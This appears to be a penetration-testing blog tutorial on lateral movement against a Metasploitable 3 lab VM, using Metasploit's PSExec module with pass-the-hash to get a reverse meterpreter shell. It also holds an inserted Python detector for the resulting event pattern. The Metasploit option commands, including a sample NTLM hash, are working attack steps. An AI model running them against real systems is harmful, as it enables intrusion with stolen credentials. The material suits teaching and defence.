Let's assume you already have a low-privilege foothold in a network and have obtained a working higher-privileged username and (hashed) password, for example via spear-phishing or by creating a new account after exploiting an unquoted service path. In this blog post I'll explain how you can obtain a meterpreter shell with these credentials. During a penetration test this is also called lateral movement. Our target machine is the Metasploitable 3 Windows Server 2008 VM.
We are going to use the Metasploit PSExec module, which has a few advantages over Sysinternals' PsExec, such as letting you change the share the payload is written to.
By default, the module takes the following actions:
- Creates a randomly-named service executable with an embedded payload
- Connects to the hidden ADMIN$ share on the remote system via SMB
- Drops malicious service executable onto the share
- Uses the Service Control Manager (SCM) to start a randomly-named service
- The service loads the malicious code into memory and executes it
- Metasploit payload handler receives payload and establishes session
- Module cleans up after itself, stopping the service and deleting the executable
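The action sequence above leaves a recognisable trace on the target. As an added detection example (not part of the original post), the following Python correlates constructed Windows event records: an administrative share access (Security event 5140 on ADMIN$ or C$) followed within a minute by a service install (System event 7045) whose name looks machine-generated. The simplified field names and the sample events are assumptions, not the raw Windows event schema.

```python
from datetime import datetime, timedelta

ADMIN_SHARES = ("ADMIN$", "C$")

# Constructed sample events (not from the original post). Shapes loosely mirror
# Windows Security event 5140 (network share accessed) and System event 7045
# (a new service was installed); only the fields this check needs are kept.
EVENTS = [
    {"ts": "2024-01-01T10:00:01", "id": 5140, "host": "WS08",
     "share": "\\\\*\\ADMIN$", "src": "10.0.0.5"},
    {"ts": "2024-01-01T10:00:03", "id": 7045, "host": "WS08",
     "service": "kGhTwQeRxM", "image": "%SYSTEMROOT%\\kGhTwQeRxM.exe"},
    {"ts": "2024-01-01T11:00:00", "id": 7045, "host": "WS08",
     "service": "Spooler", "image": "C:\\Windows\\System32\\spoolsv.exe"},
    {"ts": "2024-01-01T12:00:00", "id": 5140, "host": "WS09",
     "share": "\\\\*\\Users", "src": "10.0.0.7"},
]

def looks_random(name: str) -> bool:
    """Heuristic for machine-generated service names: alphanumeric, mixed
    case, at least 8 characters, and very few vowels."""
    if len(name) < 8 or not name.isalnum():
        return False
    if not (any(c.isupper() for c in name) and any(c.islower() for c in name)):
        return False
    vowels = sum(c in "aeiouAEIOU" for c in name)
    return vowels / len(name) < 0.3

def is_admin_share(share: str) -> bool:
    # 5140 reports the share as \\*\NAME; compare only the trailing name.
    return share.rsplit("\\", 1)[-1].upper() in ADMIN_SHARES

def detect_psexec_pattern(events, window_seconds=60):
    """Flag a service install (7045) with a random-looking name that follows
    an administrative share access (5140) on the same host within the window.
    Returns one alert dict per suspicious service install."""
    alerts = []
    window = timedelta(seconds=window_seconds)
    share_hits = [e for e in events if e["id"] == 5140 and is_admin_share(e["share"])]
    for ev in events:
        if ev["id"] != 7045 or not looks_random(ev["service"]):
            continue
        t = datetime.fromisoformat(ev["ts"])
        for hit in share_hits:
            ht = datetime.fromisoformat(hit["ts"])
            if hit["host"] == ev["host"] and timedelta(0) <= t - ht <= window:
                alerts.append({"host": ev["host"], "service": ev["service"],
                               "image": ev["image"], "src": hit["src"]})
                break
    return alerts

if __name__ == "__main__":
    for a in detect_psexec_pattern(EVENTS):
        print(f"{a['host']}: service {a['service']} ({a['image']}) "
              f"installed right after admin share access from {a['src']}")
```

The vowel heuristic is deliberately crude; in production you would combine it with an allowlist of known service names and with the service's prompt stop and deletion that the module's cleanup step produces.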
Step 1: get credentials
As mentioned, we assume we already have credentials obtained by another method (spear phishing, hashdump, unquoted service path, ...). In this case, we already have a hash dump of all accounts and their hashed passwords. I specifically chose this example because I want to demonstrate that you do not need to crack the NTLM hashed password first. You can simply pass the hash!
In this case, the username we are going to use is vagrant and our hashed password is
Note: for detailed information on loading Metasploit modules and using meterpreter, check out our Metasploit walkthrough.
First, load the exploit with the following command:
Set meterpreter as payload:
set payload windows/meterpreter/reverse_tcp
Next, set LHOST to your Kali IP address and RHOST to the IP of the victim machine. Since we know the account is a local account, set the SHARE option to C$ by entering the command:
set SHARE C$
All we need to do is add our username and password. Note that we simply use the NTLM hash we obtained via the hashdump. No need to crack the password first!
set SMBUSER vagrant
set SMBPASS aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b
Now just run exploit to get your meterpreter shell.
Overview of psexec and meterpreter options: